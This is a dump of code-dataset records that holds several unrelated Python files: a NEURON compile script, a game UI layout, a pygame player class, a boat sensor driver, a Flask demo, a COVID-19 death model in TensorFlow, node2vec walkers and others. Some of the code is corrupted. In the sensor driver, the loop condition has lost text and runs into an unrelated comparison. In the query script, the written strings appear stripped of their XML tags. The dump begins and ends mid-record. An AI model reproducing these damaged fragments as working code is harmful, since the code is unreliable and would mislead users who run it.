LeaseAgreementStatus.INACTIVE\n\tlease_agreement.save()","sub_path":"leases/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160653935","text":"queries = dict()\nqueryList = set()\n\nwith open(\"data/wt09.topics.queries-only\", \"r\") as f:\n for record in f:\n prefix, query = record.split(\":\")\n _, no = prefix.split(\"-\")\n queries[int(no.strip())] = [_.strip() for _ in query.split(\" \")]\n for q in queries[int(no.strip())]:\n queryList.add(q)\n\nqList = sorted(list(queryList))\n\nwith open(\"data/queryHTML.parameters\", \"w\") as f:\n f.write(\"\\n\\t/home/tong/lrank/indexHtml/\\n\\ttrue\\n\")\n for q in qList:\n f.write(\"\\t\\n\\t\\t{}\\n\\t\\n\".format(q))\n f.write(\"\\n\")\n","sub_path":"src/QueryParameters.py","file_name":"QueryParameters.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"22432443","text":"import os\nfrom glob import glob\n\nCWD = os.getcwd()\n\nNMODL = 'morphologies/hoc_combos_syn.1_0_10.allmods'\n\nneurons = glob(os.path.join('morphologies/hoc_combos_syn.1_0_10.allzips', 'L6*'))\nmech = 'mechanisms'\n\nif not os.path.isdir(NMODL):\n os.mkdir(NMODL)\ni = 0\nfor NRN in neurons:\n for nmodl in 
glob(os.path.join(NRN, 'mechanisms', '*.mod')):\n while not os.path.isfile(os.path.join(NMODL,\n os.path.split(nmodl)[-1])):\n os.system('cp {} {}'.format(nmodl,\n os.path.join(NMODL, '.')))\n print(\"copypasted {} out of {}\".format(i + 1, len(neurons)))\n i += 1\nos.chdir(NMODL)\nos.system('nrnivmodl')\nos.chdir(CWD)\n\n# neuron.load_mechanisms(NMODL)\n\n\n\n# for i, NRN in enumerate(neurons):\n# os.chdir(CWD)\n# os.chdir(NRN)\n# os.chdir(mech)\n# if os.path.isdir('x86_64'):\n# os.system('rm -r x86_64')\n# os.system('nrnivmodl')\n# print(\"compiled {} out of {}\".format(i + 1, len(neurons)))\n\n# os.chdir(CWD)\n","sub_path":"compile_epfl_models.py","file_name":"compile_epfl_models.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282860848","text":"import uiScriptLocale\n\nwindow = {\n\n\t\"x\" : 0,\n\t\"y\" : 0,\n\n\t\"width\" : SCREEN_WIDTH,\n\t\"height\" : SCREEN_HEIGHT,\n\n\t\"children\" :\n\t(\n\t\t## Board\n\t\t{\n\t\t\t\"name\" : \"BackGround\",\n\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\"x\" : 0,\n\t\t\t\"y\" : 0,\n\n\t\t\t\"image\" : \"d:/ymir work/ui/intro/pattern/Line_Pattern.tga\",\n\n\t\t\t\"x_scale\" : float(SCREEN_WIDTH) / 800.0,\n\t\t\t\"y_scale\" : float(SCREEN_HEIGHT) / 600.0,\n\t\t},\n\t\t{\n\t\t\t\"name\" : \"BackGround_Shadow\",\n\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\"x\" : 0,\n\t\t\t\"y\" : 0,\n\n\t\t\t\"image\" : \"yamato_load/art_mask_full.tga\",\n\n\t\t\t\"x_scale\" : float(SCREEN_WIDTH) / 1920.0,\n\t\t\t\"y_scale\" : float(SCREEN_HEIGHT) / 1080.0,\n\t\t},\n\t\t{ \n\t\t\t\"name\":\"ErrorMessage\", \n\t\t\t\"type\":\"text\", \"x\":10, \"y\":10, \n\t\t\t\"text\": uiScriptLocale.LOAD_ERROR, \n\t\t},\n\t\t{\n\t\t\t\"name\" : \"tipTextLine\",\n\t\t\t\"type\" : \"text\",\n\t\t\t\n\t\t\t\"x\" : SCREEN_WIDTH / 2,\n\t\t\t\"y\" : 18,\n\t\t\t\n\t\t\t\n\t\t\t\"text\" : \"Wusstest du schon das der Mönch dir die möglichkeit bietet Achievement-Points einzutauschen? Nein? 
Besuch ihn doch einfach mal.\",\n\t\t\n\t\t\t\"text_horizontal_align\" : \"center\",\n\t\t\t\n\t\t\t\"outline\" : 1,\n\t\t\n\t\t},\n\t\t\n\t\t{\n\t\t\t\"name\" : \"GageBoard\",\n\t\t\t\"type\" : \"window\",\n \"style\" : (\"ltr\",),\n\t\t\t\"x\" : float(SCREEN_WIDTH) * 400 / 800.0 - 475,\n\t\t\t\"y\" : float(SCREEN_HEIGHT) * 500 / 600.0 + 50,\n\t\t\t\"width\" : 400, \n\t\t\t\"height\": 80,\n\n\t\t\t\"children\" :\n\t\t\t(\n\t\t\t\n\t\t\t\t{\n\t\t\t\t\t\"name\" : \"BackGage\",\n\t\t\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\t\t\"x\" : 40,\n\t\t\t\t\t\"y\" : 25,\n\n\t\t\t\t\t\"image\" : \"yamato_load/loading_bar_empty_frame.tga\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"name\" : \"FullGage\",\n\t\t\t\t\t\"type\" : \"expanded_image\",\n\n\t\t\t\t\t\"x\" : 75,\n\t\t\t\t\t\"y\" : 50,\n\n\t\t\t\t\t\"image\" : \"yamato_load/loading_fill.tga\",\n\t\t\t\t},\n\t\t\t),\n\t\t},\n\t),\n}\n","sub_path":"multi_locale/locale/en/ui/loadingwindow.py","file_name":"loadingwindow.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"457237424","text":"import pygame\n\nimport constants\nfrom Entity import *\n\nclass Player(Entity):\n def __init__(self, manager, position, map, name = \"Player\"):\n Entity.__init__(self, manager, position, 10, map, constants.S_PLAYER, name)\n self.turnEnded = False\n\n def endTurn(self):\n self.turnEnded = True\n\n def death(self):\n Entity.death(self)\n print(\"you died!\")\n\n def input(self, event):\n if event.type == pygame.KEYDOWN:\n self.movement(event)\n\n def movement(self, event):\n \"\"\"\n Function that handles the input for movement\n only gets called when you are in the movement state\n \"\"\"\n # Down\n if event.key == pygame.K_k:\n self.move((0, -1))\n self.endTurn()\n # Up\n if event.key == pygame.K_j:\n self.move((0, 1))\n self.endTurn()\n # Left\n if event.key == pygame.K_h:\n self.move((-1, 0))\n self.endTurn()\n # Right\n if event.key == pygame.K_l:\n self.move(( 1, 0))\n self.endTurn()\n # Idle\n if event.key == pygame.K_i:\n self.endTurn()\n\n","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"519010309","text":"import numpy as np\nfrom cap_driver_py3 import *\nfrom driver_acc import *\nfrom threading import Thread\nfrom gps_driver_py3 import *\nimport time\n\ndef transforme(diff):\n\tvalue=diff+7*np.pi\n\treturn value-2*np.pi*int(value*0.5/np.pi)-np.pi\n\ndef pause(t,h,i):\n\tt+=h*(i+1)\n\tt2 = time.time()\n\tif t>t2:\n\t\ttime.sleep(t-t2)\n\telse:\n\t\t#print(\"Prob t\")\n\t\ta=1\n\ndef orient(vect):\n\tX,Y=vect[0],vect[1]\n\tnorme = (X**2+Y**2)**0.5\n\tX/=-norme\n\tY/=norme\n\tangle = np.arccos(X)\n\tif Y<0:\n\t\tangle=2*np.pi-angle\n\treturn angle-np.pi\n\n\nclass Capteur(Thread):\n\tdef __init__(self,t0,enrg=False,taille=1):\n\t\tThread.__init__(self)\n\t\tself.gps = GPS(t0,True,self.get_Cap)\n\t\tself.over = False\n\t\tself.enrg = enrg\n\t\tself.taille = int(taille*100)\n\t\tself.t0=t0\n\t\tself.pos=-1\n\t\tself.cap = Cap_driver()\n\t\tself.acc = acc_driver()\n\t\tself.sensibilite = 250\n\t\tself.listeChoc=[0]\n\t\tself.impact = False\n\t\tself.data = []\n\t\tfor i in range(self.taille):\n\t\t\tself.data.append([i*0.01,np.array([0,0,0]),0,np.array([0,0,0,0,0,0]),0])\n\t\tself.data[-1][2]=orient(self.cap.get())\n\t\tself.data[-1][4]=orient(self.cap.get())\n\t\tself.offset=0\n\t\tself.offset2=0\n\t\tself.moyenneFait = 
False\n\t\t\n\t\n\tdef finit(self):\n\t\tself.over = True\n\t\n\tdef sauve(self):\n\t\tfichier = np.zeros((self.taille,12))\n\t\tfor i in range(self.taille):\n\t\t\tfichier[i,0]=self.data[i][0]\n\t\t\tfichier[i,1:4]=self.data[i][1][:]\n\t\t\tfichier[i,4:10]=self.data[i][3][:]\n\t\t\tfichier[i,11]=self.data[i][2]\n\t\t\tfichier[i,10]=self.data[i][4]\n\t\tnp.savetxt(\"all_data.txt\",fichier)\n\t\tnp.savetxt(\"impact_time.txt\",np.array(self.listeChoc))\n\t\n\tdef filtre(self,Id):\n\t\tnouv = orient(self.data[Id][1])\n\t\tself.data[Id][4]=nouv\n\t\trot = (4*360./165.69)*0.01*(self.data[Id][3][5]-self.offset)*np.pi/(180.*1000.)\n\t\tdiff1 = transforme(nouv-self.data[self.pos][2])\n\t\tdiff2 = rot\n\t\tif self.moyenneFait:\n\t\t\treturn transforme(self.data[self.pos][2]+(0.995*diff2+0.005*diff1))\n\t\telse:\n\t\t\treturn transforme(self.data[self.pos][2]+diff1)\n\t\n\tdef run(self):\n\t\ti=0\n\t\th=0.01\n\t\tself.gps.start()\n\t\ttstart = time.time()\n\t\twhile not self.over and (iself.sensibilite and self.listeChoc[-1]+220:\n\t\t\tself.listeChoc.append(time.time()-self.t0)\n\t\t\treturn True\n\t\treturn False\n\n\n\n\n\n\n\n","sub_path":"récup finale ddboat/S4_odo_klein_bet/py3/driver_capteur.py","file_name":"driver_capteur.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336139738","text":"#!/usr/bin/python\n#coding:utf-8\n'''\nBuild a web site with the Flask framework\n'''\n#pip install flask\nfrom flask import Flask\n#import the template rendering helper that Flask provides\nfrom flask import render_template\n#request gives access to incoming GET/POST data\nfrom flask import request\n#create the app object with Flask(); by default this module acts as the app\napp = Flask(__name__)\n\n\n#set the default encoding (Python 2)\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n#first try at a web site: Hello world\n#route: maps a URL one-to-one onto a function; requests to the URL are dispatched to that function\n\n#route map\n@app.route(\"/hello/\")#appending /hello/ after the host and port runs the Hello function; the name is just an identifier\ndef Hello():\n\treturn render_template(\"main.html\")\n\n@app.route(\"/main/\")\ndef main():\n\treturn \"this is main\"\n#GET passes key=value pairs appended to the URL\n#GET values are read with request.args.get(key)\n#POST submits data through a form\n#POST values are read with request.form.get(name)\n@app.route(\"/login/\",methods=[\"GET\",\"POST\"])\ndef Login():\n\tif request.method == \"POST\":\n\t\t#print request.args\n\t\tgetName = request.form.get(\"username\")\n\t\tgetPsw = request.form.get(\"userpsw\")\n\n\t\treturn getName + getPsw\n\treturn render_template(\"login.html\")\n\n\nif __name__ == \"__main__\":\n\tapp.run(host=\"127.0.0.1\",port=4000)\n","sub_path":"Python/Project3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190557474","text":"\"\"\"Python module for COVID-19 Survival-Convolution Death Model.\n\nIn this module we focus on predicting the number of deaths with a similar\napproach to modeling the number of infections.\n\"\"\"\nfrom typing import Optional, Sequence, Text, Tuple\nimport numpy as np\nimport tensorflow as tf\nimport piecewise_linear_infection_model as infection_model\ntf.keras.backend.set_floatx('float64')\n\nAVE_DAYS_TO_OUTCOME = 18.6\nDEFAULT_MAX_INTERVENTION = 40\n\n\nclass Covid19DeathPredictModel(infection_model.Covid19InfectionsPredictModel):\n  \"\"\"Model to predict the number of cases dying from Covid-19.\n\n  Attributes:\n    w: hazard rate parameter used in defining the survival function that\n      specifies the average time until an infected patient becomes\n      symptomatic and is diagnosed positive.\n\n    death_rate: a variable that indicates probability of death given infection.\n\n  \"\"\"\n\n  def __init__(self,\n               max_intervention: int = DEFAULT_MAX_INTERVENTION,\n               **kwargs):\n    \"\"\"Initializes an instance of Covid19DeathPredictModel.\"\"\"\n    self._max_intervention = max_intervention\n    self.w = tf.Variable(\n        kwargs.pop(\"initial_guess_w\", AVE_DAYS_TO_OUTCOME),\n        name=\"w\",\n        dtype=tf.float64,\n        trainable=kwargs.pop(\"variable_w_trainable\", True))\n    trainable_death_rate = kwargs.pop(\"variable_death_rate_trainable\", True)\n    initial_guess_death_rate = kwargs.pop(\"initial_guess_death_rate\", 0.04)\n    super(Covid19DeathPredictModel, self).__init__(**kwargs)\n    self.death_rate = tf.Variable(\n        np.ones([self._n_weights, 1]) * initial_guess_death_rate,\n        name=\"death_rate\",\n        dtype=tf.float64,\n        trainable=trainable_death_rate)\n\n  def get_outcome_survival_probs(self):\n    \"\"\"Returns survival probabilities of time from onset to final outcome.\"\"\"\n    surv = tf.math.exp(\n        tf.multiply(\n            - 1. / self.w,\n            tf.range(self._max_intervention, dtype=tf.float64)))\n    return (surv - surv[self._max_intervention - 1]) / (\n        1. - surv[self._max_intervention - 1])\n\n  def get_death_conv_weights(self):\n    \"\"\"Returns the convolutional weights for modeling daily death numbers.\n\n    These are the probability mass functions of the time from a case being\n    infected until observing the final outcome (recovery / death). 
They are\n    based on the assumption that the incubation period and the time between\n    infection and final outcome (death / recovery) are independent.\n    \"\"\"\n    symptomatic_surv = self.get_symptomatic_survival_probs()\n    symptomatic_pmf = symptomatic_surv[:-1] - symptomatic_surv[1:]\n    outcome_surv = self.get_outcome_survival_probs()\n    outcome_pmf = outcome_surv[:-1] - outcome_surv[1:]\n\n    return tf.squeeze(\n        tf.nn.conv1d(\n            tf.reshape(\n                tf.pad(\n                    outcome_pmf,\n                    paddings=tf.constant(\n                        [[self._max_latency, self._max_latency - 1]]\n                    ),\n                    mode=\"CONSTANT\"),\n                [1, 2 * self._max_latency + self._max_intervention - 2, 1]\n            ),\n            tf.reshape(\n                tf.pad(\n                    symptomatic_pmf[::-1],\n                    paddings=tf.constant([[0, 1]]),\n                    mode=\"CONSTANT\"\n                ),\n                [self._max_latency, 1, 1]\n            ), 1, \"VALID\"))\n\n  def daily_death(self, inputs: np.ndarray,\n                  static_tensorshape: bool = False):\n    \"\"\"Returns the number of daily new death cases in an array.\n\n    Args:\n      inputs: a reformulated sequence of predictors that fits the tensorflow model.\n        For the detailed formats, see method \"_get_trainable_x()\" in class\n        Covid19InfectionsEstimator.\n      static_tensorshape: if True, this method will return a tensor with a fixed\n        length in training a model. Otherwise, the length can be any positive\n        integer, which is used in predicting the number of new confirmed cases\n        in the future.\n\n    Raises:\n      xxx\n\n    Returns:\n      A 1d tensor for storing the number of daily new death cases. The length\n      is the same as the length of argument \"inputs\".\n\n    \"\"\"\n    inputs_len = self._len_inputs if static_tensorshape else inputs.shape[0]\n    daily_infected_cases = tf.reshape(\n        tf.slice(\n            self._daily_infected(inputs),\n            begin=[0, self._max_latency - 1],\n            size=[inputs_len, 1]\n        ), [inputs_len])\n\n    conv_weights_len = self._max_latency + self._max_intervention - 1\n    conv_weights = self.get_death_conv_weights()\n    if conv_weights.shape[0] != conv_weights_len:\n      raise ValueError(\n          f\"The length of convolutional weights {conv_weights.shape[0]} is \"\n          f\"different from the expected value {conv_weights_len}.\")\n    return tf.squeeze(\n        tf.nn.conv1d(\n            tf.reshape(\n                tf.pad(\n                    daily_infected_cases,\n                    paddings=tf.constant(\n                        [[conv_weights_len - 1, 0]]\n                    ),\n                    mode=\"CONSTANT\"),\n                [1, conv_weights_len + inputs_len - 1, 1]\n            ),\n            tf.reshape(\n                conv_weights[::-1],\n                [conv_weights_len, 1, 1]\n            ), 1, \"VALID\")) * tf.reshape(  # Allow death rate change over time.\n        tf.matmul(inputs, (self.death_rate)), [inputs_len])\n\n  def call(self, inputs: np.ndarray) -> infection_model.TensorType:\n    \"\"\"Returns the number of deaths on a daily basis.\n\n    This method needs to be overridden to subclass keras.Model.\n\n    Args:\n      inputs: a reformulated sequence of predictors that fits the tensorflow model.\n        For the detailed formats, see method \"_get_trainable_x()\" in class\n        Covid19InfectionsEstimator.\n\n    Returns:\n      A 1d tensor for storing the number of daily new death cases. 
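get_death_conv_weights above builds the infection-to-outcome delay distribution by convolving two PMFs derived from discrete survival curves. A plain-numpy sketch of that identity, with made-up exponential survival curves (an illustration of the math only, not the model's TF padding logic):

import numpy as np

def pmf_from_survival(surv):
    # daily probability mass from a discrete survival curve, as in the model
    surv = np.asarray(surv, dtype=float)
    return surv[:-1] - surv[1:]

incubation = pmf_from_survival(np.exp(-np.arange(10) / 4.0))   # infection -> onset
outcome = pmf_from_survival(np.exp(-np.arange(15) / 6.0))      # onset -> final outcome
total_delay = np.convolve(incubation, outcome)                  # infection -> outcome
# the convolution's total mass is the product of the two masses (independence)
print(total_delay.sum(), incubation.sum() * outcome.sum())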
The length\n      is the same as the length of argument \"inputs\".\n\n    \"\"\"\n    return self.daily_death(inputs, True)\n\n\nclass Covid19DeathEstimator(infection_model.Covid19InfectionsEstimator):\n  \"\"\"Selects the best model to predict Covid-19 death tolls.\"\"\"\n\n  def __init__(self, **kwargs):\n    \"\"\"Initializes a Covid19DeathEstimator instance.\"\"\"\n    super(Covid19DeathEstimator, self).__init__(**kwargs)\n\n  def _fit_with_t0(self, data: Sequence[int], t0: int, message: Text,\n                   enable_tensorboard: bool = False,\n                   tensorboard_logdir: Optional[Text] = None\n                   ) -> Tuple[\n                       Covid19DeathPredictModel, infection_model.TensorType]:\n    \"\"\"Returns the death toll model after training with a given t0.\n\n    Args:\n      data: training data (number of daily new death tolls) in a 1d array.\n      t0: specifies the number of days between the occurrence of the first\n        infected case (patient zero) and the first observed case.\n      message: optionally pass a prefix string in the filenames of training\n        weights (in the format of hdf5 file). We will generate a lot of such\n        files in the training process.\n      enable_tensorboard: whether or not to use tensorboard to monitor training.\n      tensorboard_logdir: xxx.\n\n    Returns:\n      model: the best model after training with t0.\n      loss: the loss of the best model after training with t0.\n\n    \"\"\"\n    model = Covid19DeathPredictModel(\n        n_weights=2 * len(self._knots) + 1 - sum(self._knots_connect),\n        t0=t0,\n        len_inputs=len(data) + t0,\n        max_latency=self._estimator_args.get(\n            \"max_latency\", infection_model.DEFAULT_MAX_LATENCY),\n        max_intervention=self._estimator_args.get(\n            \"max_intervention\", DEFAULT_MAX_INTERVENTION),\n        **self._model_args)\n\n    x = self._get_trainable_x(len(data), t0)\n    # Pad t0 elements at front to be 0.\n    y = np.pad(data, [t0, 0]).astype(np.float64)\n\n    # Define the loss function for each t0 value. Compare the square-root\n    # difference.\n    def custom_loss(y_actual, y_pred):\n      return self._estimator_args.get(\n          \"loss_function\", tf.keras.losses.MSE)(\n#                tf.math.sqrt(y_actual[t0:]), tf.math.sqrt(y_pred[t0:]))\n          (y_actual[t0:]), (y_pred[t0:]))\n    optimizer_option = self._estimator_args.get(\n        \"optimizer\", tf.keras.optimizers.Adam)\n    optimizer = optimizer_option(\n        learning_rate=self._estimator_args.get(\"learning_rate\", 0.01),\n        clipnorm=1.0)\n    model.compile(optimizer, custom_loss)\n    callbacks, min_loss_filepath = Covid19DeathEstimator._setup_callbacks(\n        message, t0, enable_tensorboard, tensorboard_logdir)\n\n    model.fit(\n        x, y, epochs=self._estimator_args.get(\"epochs\", 100),\n        batch_size=len(data) + t0, shuffle=False,\n        verbose=self._estimator_args.get(\"verbose\", 0),\n        callbacks=callbacks)\n\n    model.load_weights(min_loss_filepath)\n    loss = custom_loss(y, model(x))\n    return model, loss\n\n  def predict_death(self, duration: int,\n                    flatten_future: bool = False) -> Optional[\n                        infection_model.TensorType]:\n    \"\"\"Predicts the number of new death cases reported on each day.\n\n    Args:\n      duration: specifies the number of days for prediction.\n      flatten_future: this parameter takes effect in prediction only,\n        indicating whether the infection rate or death rate is flattened in\n        the future.\n\n    Returns:\n      The number of daily new death cases in a 1d tensor. 
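_fit_with_t0 above pads t0 leading zeros onto the observations and slices them back off inside custom_loss, so only the observed days are scored. A toy numpy sketch of that masking idea (hypothetical numbers, plain numpy rather than tf.keras.losses.MSE):

import numpy as np

t0 = 3
observed = np.array([5.0, 8.0, 13.0])
y = np.pad(observed, (t0, 0))          # t0 unobserved zero-days before the first report
y_pred = np.array([0.5, 1.0, 2.0, 5.2, 7.9, 12.7])

def loss_after_t0(y_actual, y_hat, t0):
    # compare only the days with real observations, as custom_loss above does
    diff = y_actual[t0:] - y_hat[t0:]
    return float(np.mean(diff ** 2))

print(loss_after_t0(y, y_pred, t0))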
The length is equal to\n the value of duration.\n\n \"\"\"\n if self._final_model is None:\n return None\n x_pred = self._get_trainable_x(\n duration, self._final_model.t0, flatten_future)\n return self._final_model.daily_death(x_pred)[self._final_model.t0:]\n","sub_path":"python/code state/death_model.py","file_name":"death_model.py","file_ext":"py","file_size_in_byte":9698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239582532","text":"import requests\nimport json\nimport re\nimport config\n\n\ndef handler(link):\n\n global zingcookie\n link = link.replace(\"m.\", \"\")\n s = requests.Session()\n r = s.get(link, cookies=config.zingcookie)\n\n code = re.search('data-code=\\\"([a-zA-Z0-9]{20,30})\\\"', r.text).group(1)\n xml = re.search('data-xml=\\\"(.+)\\\"', r.text).group(1)\n\n data = s.get(\"http://mp3.zing.vn\" + xml, cookies=config.zingcookie).text\n dedata = json.loads(data)\n\n title = dedata['data'][0]['name']\n artist = dedata['data'][0]['artist']\n thumbnail = dedata['data'][0]['cover']\n\n content = s.get(\"http://mp3.zing.vn/json/song/get-download?code=\" + code, cookies=config.zingcookie).text\n decoded = json.loads(content)\n\n msg = decoded['msg']\n\n if msg:\n return msg\n\n link128 = \\\n s.get('http://mp3.zing.vn' + decoded['data']['128']['link'], cookies=config.zingcookie, allow_redirects=False).headers[\n 'Location']\n\n try:\n link320 = \\\n s.get('http://mp3.zing.vn' + decoded['data']['320']['link'], cookies=config.zingcookie, allow_redirects=False).headers[\n 'Location']\n except:\n link320 = \"\"\n lossless = \"\"\n return title, artist, thumbnail, link128, link320, lossless\n try:\n lossless = s.get('http://mp3.zing.vn' + decoded['data']['lossless']['link'], cookies=config.zingcookie,\n allow_redirects=False).headers['Location']\n except:\n lossless = \"\"\n return title, artist, thumbnail, link128, link320, lossless\n\n return title, artist, thumbnail, link128, link320, lossless","sub_path":"modules/zmp3.py","file_name":"zmp3.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"42440991","text":"# -*- coding: utf-8 -*-\n\nimport random\n\nimport numpy as np\n\n\ndef deepwalk_walk_wrapper(class_instance, walk_length, start_node):\n class_instance.deepwalk_walk(walk_length, start_node)\n\n\nclass BasicWalker:\n def __init__(self, G, workers):\n self.G = G.G\n self.node_size = G.node_size\n self.look_up_dict = G.look_up_dict\n\n def deepwalk_walk(self, walk_length, start_node):\n '''\n Simulate a random walk starting from start node.\n '''\n\n walk = [start_node]\n\n while len(walk) < walk_length:\n cur = walk[-1]\n cur_nbrs = list(self.G.neighbors(cur))\n if len(cur_nbrs) > 0:\n walk.append(random.choice(cur_nbrs))\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n '''\n Repeatedly simulate random walks from each node.\n '''\n walks = []\n nodes = list(self.G.nodes())\n print('Begin random walks...')\n for walk_iter in range(num_walks):\n # pool = multiprocessing.Pool(processes = 4)\n # print(str(walk_iter+1), '/', str(num_walks))\n random.shuffle(nodes)\n for node in nodes:\n # walks.append(pool.apply_async(deepwalk_walk_wrapper, (self, walk_length, node, )))\n walks.append(self.deepwalk_walk(\n walk_length=walk_length, start_node=node))\n # pool.close()\n # pool.join()\n # print(len(walks))\n print('Walk finished...')\n return walks\n\n\nclass Walker:\n def __init__(self, 
G, p, q, update, workers):\n self.G = G.G\n self.p = p\n self.q = q\n self.node_size = G.node_size\n self.look_up_dict = G.look_up_dict\n self.update = update\n self.alias_nodes = {}\n self.alias_edges = {}\n\n def node2vec_walk(self, walk_length, start_node):\n '''\n Simulate a random walk starting from start node.\n '''\n\n walk = [start_node]\n\n while len(walk) < walk_length:\n cur = walk[-1]\n cur_nbrs = list(self.G.neighbors(cur))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(\n cur_nbrs[alias_draw(self.alias_nodes[cur][0], self.alias_nodes[cur][1])])\n else:\n prev = walk[-2]\n pos = (prev, cur)\n next = cur_nbrs[alias_draw(self.alias_edges[pos][0],\n self.alias_edges[pos][1])]\n walk.append(next)\n else:\n break\n\n return walk\n\n def simulate_walks(self, num_walks, walk_length, vectors):\n '''\n Repeatedly simulate random walks from each node.\n '''\n walks = []\n nodes = list(self.G.nodes())\n print('Begin random walk...')\n for walk_iter in range(num_walks):\n # print(str(walk_iter+1), '/', str(num_walks))\n random.shuffle(nodes)\n for node in nodes:\n if self.update and node in vectors.keys():\n continue\n walks.append(self.node2vec_walk(\n walk_length=walk_length, start_node=node))\n print('Walk finished...')\n return walks\n\n def get_alias_edge(self, src, dst):\n '''\n Get the alias edge setup lists for a given edge.\n '''\n\n unnormalized_probs = []\n for dst_nbr in self.G.neighbors(dst):\n if dst_nbr == src:\n unnormalized_probs.append(self.G[dst][dst_nbr]['weight'] / self.p)\n elif self.G.has_edge(dst_nbr, src):\n unnormalized_probs.append(self.G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(self.G[dst][dst_nbr]['weight'] / self.q)\n norm_const = sum(unnormalized_probs)\n if norm_const > 0.0:\n normalized_probs = [\n float(u_prob) / norm_const for u_prob in unnormalized_probs]\n else:\n normalized_probs = unnormalized_probs\n\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n '''\n Preprocessing of transition probabilities for guiding the random walks.\n '''\n for node in self.G.nodes():\n if self.update and node in self.alias_nodes.keys():\n continue\n unnormalized_probs = [self.G[node][nbr]['weight']\n for nbr in self.G.neighbors(node)]\n norm_const = sum(unnormalized_probs)\n if norm_const > 0.0:\n normalized_probs = [\n float(u_prob) / norm_const for u_prob in unnormalized_probs]\n else:\n normalized_probs = unnormalized_probs\n self.alias_nodes[node] = alias_setup(normalized_probs)\n\n triads = {}\n\n for edge in self.G.edges():\n if self.update and edge in self.alias_edges.keys():\n continue\n self.alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n\n return\n\n\ndef alias_setup(probs):\n '''\n Compute utility lists for non-uniform sampling from discrete distributions.\n Refer to https://hips.seas.harvard.edu/blog/2013/03/03/the-alias-method-efficient-sampling-with-many-discrete-outcomes/\n for details\n '''\n K = len(probs)\n q = np.zeros(K, dtype=np.float32)\n J = np.zeros(K, dtype=np.int32)\n\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n if q[kk] < 1.0:\n smaller.append(kk)\n else:\n larger.append(kk)\n\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n\n J[small] = large\n q[large] = q[large] + q[small] - 1.0\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n\n return J, q\n\n\ndef alias_draw(J, q):\n '''\n Draw sample from a non-uniform discrete distribution using alias sampling.\n 
'''\n K = len(J)\n\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n","sub_path":"src/bionev/OpenNE/walker.py","file_name":"walker.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"519781316","text":"import cv2\nimport numpy as np\n\ndef main():\n\n cap = cv2.VideoCapture(1)\n\n while (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Display the resulting frame\n cv2.imshow('frame', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"_main_\":\n main()\n\n#3b img_ds bruitee\n# -> image binaire est tres bruitee\n# -> 2 solutions pour ameliorer le resultat\n# -> a) prefiltrage de img_ds.jpg avant binaritation\n# -> b) post-traitement de l'image binaire a l'aide d'operateurs de morphologie mathematique (CF TE4)\n","sub_path":"COURS_3.2_Video.py","file_name":"COURS_3.2_Video.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"546383559","text":"\"\"\"Definition of the Article content type\n\"\"\"\n\nfrom zope.interface import implements, directlyProvides\nfrom zope.component import adapter, getUtility\n\nfrom Acquisition import aq_inner, aq_parent\nfrom DateTime import DateTime\n\nfrom Products.CMFCore.utils import getToolByName\n\nfrom Products.Archetypes import atapi\nfrom Products.ATContentTypes.content import base\nfrom Products.ATContentTypes.content import schemata\n\n# import additional widget UploadReferenceWidget for usage\n# with the file and image attachments\nfrom Products.UploadReferenceWidget.widget import UploadReferenceWidget\n\nfrom weka.content import contentMessageFactory as _\nfrom weka.content.interfaces import IArticle\nfrom weka.content.config import PROJECTNAME\n\nArticleSchema = schemata.ATContentTypeSchema.copy() + atapi.Schema((\n\n # -*- Your Archetypes field definitions here ... 
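alias_setup and alias_draw in the walker record above implement the alias method: O(K) table construction, then O(1) sampling per draw from a discrete distribution. A quick usage sketch that checks empirical frequencies against the input probabilities, assuming the two functions as defined in that record:

import numpy as np

probs = [0.1, 0.2, 0.7]                 # toy distribution
J, q = alias_setup(probs)               # build the alias tables once
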